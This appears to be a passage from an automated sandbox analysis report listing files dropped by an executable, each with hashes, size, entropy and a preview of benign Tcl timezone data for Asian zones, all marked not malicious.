                                                                                                                                                                                                                              MD5:AD3236CFF141732831732357AB181EE3
                                                                                                                                                                                                                              SHA1:EAF51A63898A2048EA5FBE9BA4C001EEE37FFDB2
                                                                                                                                                                                                                              SHA-256:411E31D09FFA48E44169C42661AE2F7FC142460BCAA216837D8C4740983CA7BD
                                                                                                                                                                                                                              SHA-512:6CA2D89C02568580786BE98A863453ADCF4D21CAC52E5B44C4F7A05E76D29AEB3E28E353D6FB758BB553DBC8F35389462B388F61E94C68F5DB50A3E8C429336D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Riyadh) {.. {-9223372036854775808 11212 0 LMT}.. {-719636812 10800 0 +03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.946090704619887
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8I65eV5XHAIgN2h6560ARL/2WFKwJ6h4WFK365ey:SlSWB9vsM3yJAVJHAIgA4k0AN/2wKl4i
                                                                                                                                                                                                                              MD5:0766480A295525EE5D65F1ED32094858
                                                                                                                                                                                                                              SHA1:7A2D68E1009DDD809A4A700931456C617DCD343A
                                                                                                                                                                                                                              SHA-256:C695981A0DF691C3F4509999FBC52858ADC75024CCCBDEFBE1094FED17E809E4
                                                                                                                                                                                                                              SHA-512:A21536FB61A64E953E8D6414FF0AEF1BC7E68A33C5DCF7090517A91FC449B96A93A4FBDF2C00682540D1193FDB29603349F5BDB455FD90045FDBCA61247A9860
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ho_Chi_Minh)]} {.. LoadTimeZoneFile Asia/Ho_Chi_Minh..}..set TZData(:Asia/Saigon) $TZData(:Asia/Ho_Chi_Minh)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2117
                                                                                                                                                                                                                              Entropy (8bit):3.7276904131666577
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5q+3Vv+0j6lua2Gg/3gO8UoflcXRDhUBAc+:YxIa2GOT8tiXBC6c+
                                                                                                                                                                                                                              MD5:295D51B8FBBE890C97637687B8F32322
                                                                                                                                                                                                                              SHA1:7BB72B0EC783898DDF625D275E3BBB964D1693FB
                                                                                                                                                                                                                              SHA-256:D7D0EA5CEF908442AB0D777A4B097BED18540CD5280FF63F33DD989E27E72908
                                                                                                                                                                                                                              SHA-512:9B3E3BA01EAE38A00B0EE8A8FB17191CB4ED2EE9E46AE06403BA8C1193804764C86599840DC03E0C6A631456E1BE2BC560BDF6CF0450068EF78A6E494041326C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Sakhalin) {.. {-9223372036854775808 34248 0 LMT}.. {-2031039048 32400 0 +09}.. {-768560400 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):879
                                                                                                                                                                                                                              Entropy (8bit):3.9460497720710506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5t8eZd7QvalvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKT10Sv6r:5MvalvNhQQvmRKqv0fvzQIovWdvEGvDO
                                                                                                                                                                                                                              MD5:10A758996B0DF756E520541BEA9B7D75
                                                                                                                                                                                                                              SHA1:137E5FD4E00CFA4B3939EF11868862B7F93D87CD
                                                                                                                                                                                                                              SHA-256:35E4B905723891281D9A6A0A1FD3760A3A48136E1419C686BE31ACE83BF7AA9D
                                                                                                                                                                                                                              SHA-512:7E32661731EAB2ED8C387533ACCB4853F5B6225BAC11E93247E7B06D7AA856E6A665F63718BFE395CFD00F80A4C16789D7097FFA8DAD88B1D707BF9C155C1D4C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Samarkand) {.. {-9223372036854775808 16073 0 LMT}.. {-1441168073 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {694206000 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):985
                                                                                                                                                                                                                              Entropy (8bit):4.121802167517286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5AemgvHzF+zg2c+z3NGmJhIUfqII8yHg/zoD:5F/nfWUBISHg/G
                                                                                                                                                                                                                              MD5:A1DE6975DEA70D7241B5B3C43E1EA3AA
                                                                                                                                                                                                                              SHA1:35EE563A2BCA77C761F7E878997763EA8D258040
                                                                                                                                                                                                                              SHA-256:C4F82C94650572FE4D03BC1FE54CED8F4BF55DFBEE855D52DE3EA6378240AF93
                                                                                                                                                                                                                              SHA-512:1639B0609115DBEA6A381986A732A5CA1523952AEF84843B4D714D5B2FF40B16C4166D8D60D31D4FC2C2BA34DED1F6DB39474336195603562265BDBF71687696
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Seoul) {.. {-9223372036854775808 30472 0 LMT}.. {-1948782472 30600 0 KST}.. {-1830414600 32400 0 JST}.. {-767350800 32400 0 KST}.. {-681210000 36000 1 KDT}.. {-672228000 32400 0 KST}.. {-654771600 36000 1 KDT}.. {-640864800 32400 0 KST}.. {-623408400 36000 1 KDT}.. {-609415200 32400 0 KST}.. {-588848400 36000 1 KDT}.. {-577965600 32400 0 KST}.. {-498128400 30600 0 KST}.. {-462702600 34200 1 KDT}.. {-451733400 30600 0 KST}.. {-429784200 34200 1 KDT}.. {-418296600 30600 0 KST}.. {-399544200 34200 1 KDT}.. {-387451800 30600 0 KST}.. {-368094600 34200 1 KDT}.. {-356002200 30600 0 KST}.. {-336645000 34200 1 KDT}.. {-324552600 30600 0 KST}.. {-305195400 34200 1 KDT}.. {-293103000 30600 0 KST}.. {-264933000 32400 0 KST}.. {547578000 36000 1 KDT}.. {560883600 32400 0 KST}.. {579027600 36000 1 KDT}.. {592333200 32400 0 KST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):981
                                                                                                                                                                                                                              Entropy (8bit):4.16042656890735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Te3vvZJzHjwH6kHp7FH32AzHjZBHNHlQHuHxmHUjH6zHj2HBHeC:5ovZZO7lLpT24
                                                                                                                                                                                                                              MD5:A266AA43A84FD5E4890BC77AA4E240D0
                                                                                                                                                                                                                              SHA1:CD88C5D451CD7D3F50C9B36FDD47C84D20377441
                                                                                                                                                                                                                              SHA-256:3AABB42D9EFE95D906B7F34640E7815919A1A20979EBB6EC1527FCAA3B09B22A
                                                                                                                                                                                                                              SHA-512:13AE48F58C9AF24002F0FE4F28BF96B10EE0ED293E0DE9D29BCEBAAE102B2EA818F42CA4069544A254C95444A48604EC57E6AB2BEBDA4B5E72C82B49E61AD0A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Shanghai) {.. {-9223372036854775808 29143 0 LMT}.. {-2177481943 28800 0 CST}.. {-1600675200 32400 1 CDT}.. {-1585904400 28800 0 CST}.. {-933667200 32400 1 CDT}.. {-922093200 28800 0 CST}.. {-908870400 32400 1 CDT}.. {-888829200 28800 0 CST}.. {-881049600 32400 1 CDT}.. {-767869200 28800 0 CST}.. {-745833600 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716889600 32400 1 CDT}.. {-699613200 28800 0 CST}.. {-683884800 32400 1 CDT}.. {-670669200 28800 0 CST}.. {-652348800 32400 1 CDT}.. {-650016000 28800 0 CST}.. {515527200 32400 1 CDT}.. {527014800 28800 0 CST}.. {545162400 32400 1 CDT}.. {558464400 28800 0 CST}.. {577216800 32400 1 CDT}.. {589914000 28800 0 CST}.. {608666400 32400 1 CDT}.. {621968400 28800 0 CST}.. {640116000 32400 1 CDT}.. {653418000 28800 0 CST}.. {671565600 32400 1 CDT}.. {684867600 28800 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):372
                                                                                                                                                                                                                              Entropy (8bit):4.436676898144829
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKfbSDm2OHxdoHvm5vWOb/MVSYyF/3MesF5XJSx0dMVSSFF8kvScHS:MB862nbGmdHDCvsvDTMsF/CFDMx/HHbe
                                                                                                                                                                                                                              MD5:C3D13D921E4C6E475910E5080B761C32
                                                                                                                                                                                                                              SHA1:8C5AE73C4098D03908E5D567FD7C4D827601D718
                                                                                                                                                                                                                              SHA-256:05C76B58A4E356FD358E24FBC71FAE98DCB18C441C8D8CBB13A18D4F6E406062
                                                                                                                                                                                                                              SHA-512:3A620597469D31577ECAAA098C95C244F0C288ABACE9E8964D8641154C1893967EFBD7211A41751D0D4CC1B0B9A2286F11738EFB7D01F110A4826BBE1844A2EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Singapore) {.. {-9223372036854775808 24925 0 LMT}.. {-2177477725 24925 0 SMT}.. {-2038200925 25200 0 +07}.. {-1167634800 26400 1 +0720}.. {-1073028000 26400 0 +0720}.. {-894180000 27000 0 +0730}.. {-879665400 32400 0 +09}.. {-767005200 27000 0 +0730}.. {378664200 28800 0 +08}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2064
                                                                                                                                                                                                                              Entropy (8bit):3.7913177223006698
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5HJeidmbv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKxwy:5HSv+0j6lua2Gg/3gO8UoOZU2Wc/pKf
                                                                                                                                                                                                                              MD5:B4FA38E884A85F6BD47C8BB02BB0500C
                                                                                                                                                                                                                              SHA1:1DD135B79CC0D81C048D7B2C6BE0CF71171DD19E
                                                                                                                                                                                                                              SHA-256:705D6D8360C2DCD51E909E39E1910FE876145220D151031612DA36B247207395
                                                                                                                                                                                                                              SHA-512:2D32AAAF1BCC865B5F2810BFE0FB82BE98140BB5F2ECA1DA7FD148A3074DA127B81242F17B8BA9C9E259B61CBB123FD1513CCE6A85C8D7679ADFC0D689B552BB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Srednekolymsk) {.. {-9223372036854775808 36892 0 LMT}.. {-1441188892 36000 0 +10}.. {-1247565600 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1344
                                                                                                                                                                                                                              Entropy (8bit):4.062084847879695
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5X2eIvZPzGzHjZBHNHlQHKn3HnHNd9HiHkHBHaHLHMtyH9Qm+zHFOzHZ32HZvHiR:5Xi1ypBvt1mwO3Kq46T
                                                                                                                                                                                                                              MD5:AECA800C8F2A679D0B19E5BB90AFD858
                                                                                                                                                                                                                              SHA1:2C7DCEB709F9A4312C511971FE1E6A9DC1FBD0E8
                                                                                                                                                                                                                              SHA-256:389C9D3EE2970665D0D8C5CB61B8B790C5FBDDC0DF0BF2B9753046F5953A477F
                                                                                                                                                                                                                              SHA-512:C2D6BB4FEB5848D0704647D26F94C0BD8CD7E834AA2187EC9C877E80157E9CC225BBA3BECEE0148894C8639105D292AB50EE95830992BF357C632ACF001E020F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Taipei) {.. {-9223372036854775808 29160 0 LMT}.. {-2335248360 28800 0 CST}.. {-1017820800 32400 0 JST}.. {-766224000 28800 0 CST}.. {-745833600 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716889600 32400 1 CDT}.. {-699613200 28800 0 CST}.. {-683884800 32400 1 CDT}.. {-670669200 28800 0 CST}.. {-652348800 32400 1 CDT}.. {-639133200 28800 0 CST}.. {-620812800 32400 1 CDT}.. {-607597200 28800 0 CST}.. {-589276800 32400 1 CDT}.. {-576061200 28800 0 CST}.. {-562924800 32400 1 CDT}.. {-541760400 28800 0 CST}.. {-528710400 32400 1 CDT}.. {-510224400 28800 0 CST}.. {-497174400 32400 1 CDT}.. {-478688400 28800 0 CST}.. {-465638400 32400 1 CDT}.. {-449830800 28800 0 CST}.. {-434016000 32400 1 CDT}.. {-418208400 28800 0 CST}.. {-402480000 32400 1 CDT}.. {-386672400 28800 0 CST}.. {-370944000 32400 1 CDT}.. {-355136400 28800 0 CST}.. {-3394080
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                              Entropy (8bit):3.9280321712564845
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5geQqdNRvOt81FCuLqecDngO6jPvTpYy5T4TXvKT10Sv6r:5+EvdJqxiF0rvK50Sv6r
                                                                                                                                                                                                                              MD5:DB59DB8E401E12917B7367D5604D3DE6
                                                                                                                                                                                                                              SHA1:7CC7C5C1DB551BD381B833C81746201D36BC59A9
                                                                                                                                                                                                                              SHA-256:4445F3F892C7267A6867009CC1A3F0B0548D0240408375A9D15360B28993C2A9
                                                                                                                                                                                                                              SHA-512:2C7AE63C408A9F06F973AAC16845E1DBE92D15A421BBBE420914F21155AD5E57CD058D7E4427E43185E023D2FF475EBF9D74003ECEF004FF4E5F9D5681ADFB80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tashkent) {.. {-9223372036854775808 16631 0 LMT}.. {-1441168631 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {694206000 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1729
                                                                                                                                                                                                                              Entropy (8bit):3.6815162494646034
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5yBeqvIdZlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPqUsx9Ul4N:5MmsUf8mFpNWFnytO6VnYK
                                                                                                                                                                                                                              MD5:C376C9ED66F6CC011E063D3E8E0DCED1
                                                                                                                                                                                                                              SHA1:13C6345F8CB0EC79FE7C78B156C5737BCB66E49E
                                                                                                                                                                                                                              SHA-256:B637BB0E49144C717E99E93540CB2C4D3695D63B91FE42547F2F0AA006498693
                                                                                                                                                                                                                              SHA-512:FD60192CBEDC91C5D6B3B5E6F19DEDCAE14DCF48DCAE6D4865A8F0BBDC01CBF8DAAE92C4C46C353AF5B3EEE36CCC87B23F193DDF221132F5404C42507B708364
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tbilisi) {.. {-9223372036854775808 10751 0 LMT}.. {-2840151551 10751 0 TBMT}.. {-1441162751 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {694213200 10800 0 +03}.. {701816400 14400 1 +03}.. {717537600 10800 0 +03}.. {733266000 14400 1 +03}.. {748
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2354
                                                                                                                                                                                                                              Entropy (8bit):3.666553647637418
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Z2eendFalxbr1p4USUcESUUxSuEqzSUUongA3jJW3eY37U8uuZrc3cNWH1/ANzx:54G9SOSWzx1qcK83kv3OR0xV1ox
                                                                                                                                                                                                                              MD5:A7A174A14E51E0ACD7092D2A5AA50F99
                                                                                                                                                                                                                              SHA1:69ADDDDB68084B90819AD49A5230D5B0E1A9CD85
                                                                                                                                                                                                                              SHA-256:25870503A8A679DA13B98117BD473EAA0C79B094B85D3AD50629FF0946D5EACE
                                                                                                                                                                                                                              SHA-512:1ECFB558B13C94BDC848E7BBBB0CA1BB854BB12E112EBF306045EC14F00CE3E3C2DA51EBA8AF2D63C95D71B945647C3D9E9881158FE128DEBE940A742C4BFEB1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tehran) {.. {-9223372036854775808 12344 0 LMT}.. {-1704165944 12344 0 TMT}.. {-1090466744 12600 0 +0330}.. {227820600 16200 1 +0330}.. {246227400 14400 0 +04}.. {259617600 18000 1 +04}.. {271108800 14400 0 +04}.. {283982400 12600 0 +0330}.. {296598600 16200 1 +0330}.. {306531000 12600 0 +0330}.. {322432200 16200 1 +0330}.. {338499000 12600 0 +0330}.. {673216200 16200 1 +0330}.. {685481400 12600 0 +0330}.. {701209800 16200 1 +0330}.. {717103800 12600 0 +0330}.. {732745800 16200 1 +0330}.. {748639800 12600 0 +0330}.. {764281800 16200 1 +0330}.. {780175800 12600 0 +0330}.. {795817800 16200 1 +0330}.. {811711800 12600 0 +0330}.. {827353800 16200 1 +0330}.. {843247800 12600 0 +0330}.. {858976200 16200 1 +0330}.. {874870200 12600 0 +0330}.. {890512200 16200 1 +0330}.. {906406200 12600 0 +0330}.. {922048200 16200 1 +0330}.. {937942200 12600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.876713308636272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85zFFfXHAIgN0AzFFVHRL/2WFK+TT52WFKYzFgn:SlSWB9vsM3yZbPHAIgCAXRN/2wKsswKR
                                                                                                                                                                                                                              MD5:40B15013485EE2138A3DCB915F9121E7
                                                                                                                                                                                                                              SHA1:3ADBE38686C7CA1FDE3DDD12BE908F39BFD1E228
                                                                                                                                                                                                                              SHA-256:07537A30E6236D9E334DAFD5C4D352D25FDEF95D6DC7496F5D93EFAB74D9EBB1
                                                                                                                                                                                                                              SHA-512:DA3B7B44B3BEF07CA8AA5253BF684A838181D8A15D7CCF0447A6B5F5BAE28D155CF65BCFB6286EB36C0B9F4FDD1FE862A3297ADB6FC33532B9F766334283D725
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Jerusalem)]} {.. LoadTimeZoneFile Asia/Jerusalem..}..set TZData(:Asia/Tel_Aviv) $TZData(:Asia/Jerusalem)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.906503135441824
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8kNZ4WXHAIgNqFNKARL/2WFK9Z752WFKvNZovn:SlSWB9vsM3ykZ42HAIgc3KAN/2wKf126
                                                                                                                                                                                                                              MD5:081862B6FB33389BEC9B0E6B500AA342
                                                                                                                                                                                                                              SHA1:AF9467BB87C4C28921DF62A87B81223052F9FF4A
                                                                                                                                                                                                                              SHA-256:37459C17B59639DF62B3F3943751902CE6AAF1F11B7630069DB45052EBEFB5B9
                                                                                                                                                                                                                              SHA-512:CAF6F1C928528C4471229A2EF2944623545626532986628E6CE38884535286A0B38BA88C1A295E8B11322475D6BFAC61BF89786A76330C1A0C729339A3532BAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Thimphu)]} {.. LoadTimeZoneFile Asia/Thimphu..}..set TZData(:Asia/Thimbu) $TZData(:Asia/Thimphu)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.887493603495978
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKvNZJMXGm2OHEQUTFnoHqVaJKuc/v6Q61V9gmZVFSTVV:SlSWB9eg/2wKVZJDm2OHEfnoHDKuc/SC
                                                                                                                                                                                                                              MD5:F239452984CCA9F23E97A880652C39E6
                                                                                                                                                                                                                              SHA1:52D25282D03B79960F152D21E7492EE26DAEBBAA
                                                                                                                                                                                                                              SHA-256:B797C74E3840298C3CD8149FC8AA4BCE839EFE79E7C3310986FF23C965607929
                                                                                                                                                                                                                              SHA-512:1044BEDAE04FCA7BD62937AFCE70F6C447583A90DD1596C3029A64A8251E3F73C106F4D940548DD38E895D67FEFDCD196B257E11437DEB399085EE80C345AA50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Thimphu) {.. {-9223372036854775808 21516 0 LMT}.. {-706341516 19800 0 +0530}.. {560025000 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):388
                                                                                                                                                                                                                              Entropy (8bit):4.470556147950505
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862ymdHOx5CvAoK3zoiIxtoFDIe+zT0agbov:5yeOCvARzzCOVa/gby
                                                                                                                                                                                                                              MD5:3CCC15B63A882DB1B7459A51CD1C8165
                                                                                                                                                                                                                              SHA1:77A3EFE6E4EE524B9EC6F51593DD7521FD7B8DAD
                                                                                                                                                                                                                              SHA-256:3DA522FA88541A375D53F30A0B62DC4A305FA0315FEE534B7998C9E0A239450A
                                                                                                                                                                                                                              SHA-512:15238E96DABAB5D2B9FFD25B3F50417ED32205FA69239D6F6B28DA97A378D669FD409164964D0DD2A5B1D795C8F60E8D4EB15924046348C3D6010646A536E07C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
